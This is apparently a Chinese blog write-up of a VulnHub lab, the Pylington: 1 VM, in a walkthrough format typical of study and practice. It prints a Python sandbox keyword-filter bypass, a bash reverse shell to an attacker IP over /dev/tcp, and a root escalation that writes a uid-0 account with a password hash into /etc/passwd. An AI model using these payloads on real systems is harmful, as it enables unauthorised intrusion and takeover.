首页 > 其他分享 >vulnhub靶场之PYLINGTON: 1

vulnhub靶场之PYLINGTON: 1

时间:2023-03-14 10:22:05浏览次数:39  
标签:文件 py 192.168 PYLINGTON 信息 vulnhub 靶场 权限 root

准备:

攻击机:虚拟机kali、本机win10。

靶机:Pylington: 1,下载地址:https://download.vulnhub.com/pylington/pylington.ova,下载后直接vbox打开即可。

知识点:敏感文件发现和利用、python代码执行、shell反弹、python代码过滤绕过。

一:信息收集

1.nmap扫描

使用nmap扫描下靶机地址,命令:nmap -sn 192.168.5.0/24,发现靶机地址:192.168.5.76。

使用nmap扫描下端口对应的服务:nmap -T4 -sV -p- -A 192.168.5.76,显示开放了22端口、80端口,开启了ssh服务、http服务。

2.目录扫描

使用gobuster进行目录扫描,命令:gobuster dir -u http://192.168.5.73 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt,发现robots.txt文件。

3.web信息

访问web服务时查看了下源代码信息,但是未发现有用信息,然后想着注册账户登录,但是告诉我们无法注册新用户,只能已经存在得账户才可以登录。

访问下目录扫描时发现的robots.txt文件,发现新的目录信息:/zbir7mn240soxhicso2z。

访问新发现的目录,返回页面信息中存在账户和密码信息:steve/bvbkukHAeVxtjjVH。

二:获取shell

利用获得账户和密码信息:steve/bvbkukHAeVxtjjVH登录系统,发现可以执行python代码和一个指向链接,访问该链接跳转到了:http://192.168.5.76/noimportos_sandbox.py,并给我们提示,告诉我们不要输入:import、os、open命令。

测试了以下import命令,发现会被检测并返回:H4CK3R AL3R7!!! Malicious program detected by the sandbox。尝试绕过对关键字符串的限制,使用拼接法进行测试,payload:exec('print("imp"+"ort")'),成功绕过限制输出import。

开始构造shell反弹语句,使用exec执行我们构造得shell反弹语句成功获得shell权限。

#原来语句
import os
os.system('bash -i >&/dev/tcp/192.168.5.71/6688 0>&1')

#绕过限制后得语句,注意有个双引号,不然会引起歧义无法执行
'imp'+'ort o'+'s'
'o'+"s.system('bash -i >&/dev/tcp/192.168.5.71/6688 0>&1')"

#执行语句
exec('imp'+'ort o'+'s')
exec('o'+"s.system('bash -i >&/dev/tcp/192.168.5.71/6688 0>&1')")

或者通过脚本进行进制转生成可执行的字符串也行,如下可以获得返回的id信息,两种绕过方式均可以。

oct_result= ''
strings = 'import os'
for string in strings:
    one_char = ord(string)
    oct_result = oct_result + str(oct(one_char).replace('0o','\\'))
print(oct_result)
#import os结果
\151\155\160\157\162\164\40\157\163
#os.system('id')结果
\157\163\56\163\171\163\164\145\155\50\47\151\144\47\51

三:提权

1.提权至py

尝试使用sudo -l来查找下特殊命令,但是告诉我们sudo需要密码。

使用命令:find / -perm -4000 -type f 2>/dev/null来查找下具有特殊权限的文件,发现/home/py/typing文件。

 进入/home/py目录下发现user.txt、typing.cc、typing文件,并对对typing.c文件具有读取权限,对typing文件具有执行权限。

 查看typing.cc文件得源码信息,发现该程序可以告诉我们密码信息。

执行typing文件,并按要求输入line得值,成功获得密码信息:54ezhCGaJV。

 利用获得密码信息:54ezhCGaJV尝试切换到py账户,su py。成功切换到py账户并读取/home/py目录下的user.txt文件,成功获得flag值。

2.提权至root

尝试使用sudo命令,但是被限制了。想想也是密码都给你了咋会让你使用sudo。

那就继续使用命令:find / -perm -4000 -type f 2>/dev/null来查找下具有特殊权限的文件,发现:/home/py/secret_stuff/backup文件。

进入/home/py/secret_stuff目录发现了backup得源码文件:backup.cc,访问backup.cc文件发现我们可以随意将一些信息备份到以/srv/backups/目录开头得文件中,因此想到直接向/etc/passwd文件中写入具有root权限的账户。

我们可以直接查看下kali中的密码信息然后写入到靶机中或者使用openssl创建密码:openssl passwd -1 -salt upfine upfine,我这里直接使用本机kali的密码:$y$j9T$lR7REZ4XgU56yXNl9PFiN/$oI3B/OeQGXOoTb7opQ.azBMOgG2IM0neRj4MN3HCqQ.,可以在/etc/shadow文件查看,然后查看靶机中的root权限信息,命令cat /etc/passwd,发现其权限信息为:root:x:0:0::/root:/bin/bash,因此我们构造payload:upfine:$y$j9T$lR7REZ4XgU56yXNl9PFiN/$oI3B/OeQGXOoTb7opQ.azBMOgG2IM0neRj4MN3HCqQ.:0:0::/root:/bin/bash,将payload写入到/etc/passwd问价即可。

尝试切换到我们添加的upfine账户,su upfine,成功切换到upfine账户并且该账户具有root权限。

获得root权限后在/root目录发现root.txt文件,读取该文件成功获得flag值。

标签:文件,py,192.168,PYLINGTON,信息,vulnhub,靶场,权限,root
From: https://www.cnblogs.com/upfine/p/17211842.html

相关文章

  • Vulnhub之Source靶机详细测试过程
    Source识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Source]└─$sudonetdiscover-ieth1-r10.1.1.0/24Currentlyscanning:10.1.1.0/24|ScreenVi......
  • Vulnhub之Sunset:Sunrise靶机详细测试过程
    Sunrise靶机信息名称:sunset:sunrise地址:https://www.vulnhub.com/entry/sunset-sunrise,406/识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]└─$......
  • phpstudy的安装与靶场搭建
    phpStudy中集成了apache、nginx、mysql等常用软件,需要的时候一键启动,省去了一个个配环境的麻烦一、下载安装下载链接:https://www.xp.cn/download.html下载完成后解压......
  • Vulnhub之TBBT2靶机详细测试过程
    TBBT2作者:jasonhuawen靶机信息名称:TBBT:2-FunWithFlags地址:https://www.vulnhub.com/entry/tbbt-2-funwithflags,461/识别目标主机IP地址(kali㉿kali)-[~/Vu......
  • Vulnhub:Assertion-1.0.1靶机
    kali:192.168.111.111靶机:192.168.111.218信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.218查看index.php源码发现包含其他文件尝试包......
  • Vulnhub之Tempus-Fugit-3靶机详细测试过程
    Tempus-Fugit-3识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|......
  • portswigger 靶场之“目录遍历”
    所有实验室|网络安全学院(portswigger.net)Directorytraversal目录1.文件路径遍历,简单案例2.文件路径遍历,通过绝对路径旁路阻止遍历序列3.文件路径遍历,非递归剥......
  • vulnhub靶场之HARRYPOTTER: NAGINI
    准备:攻击机:虚拟机kali、本机win10。靶机:HarryPotter:Nagini,下载地址:https://download.vulnhub.com/harrypotter/Nagini.ova,下载后直接vbox打开即可。知识点:shell反弹、......
  • Vulnhub DC-9靶场WriteUP
    Recon  首先使用netdiscover扫描靶机,靶机IP地址为192.168.244.135。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.244.0/24Currentlyscanning:192.1......
  • Vulnhub:Seppuku靶机
    kali:192.168.111.111靶机:192.168.111.212信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.212对samba服务进行枚举发现三个系统用户enum4......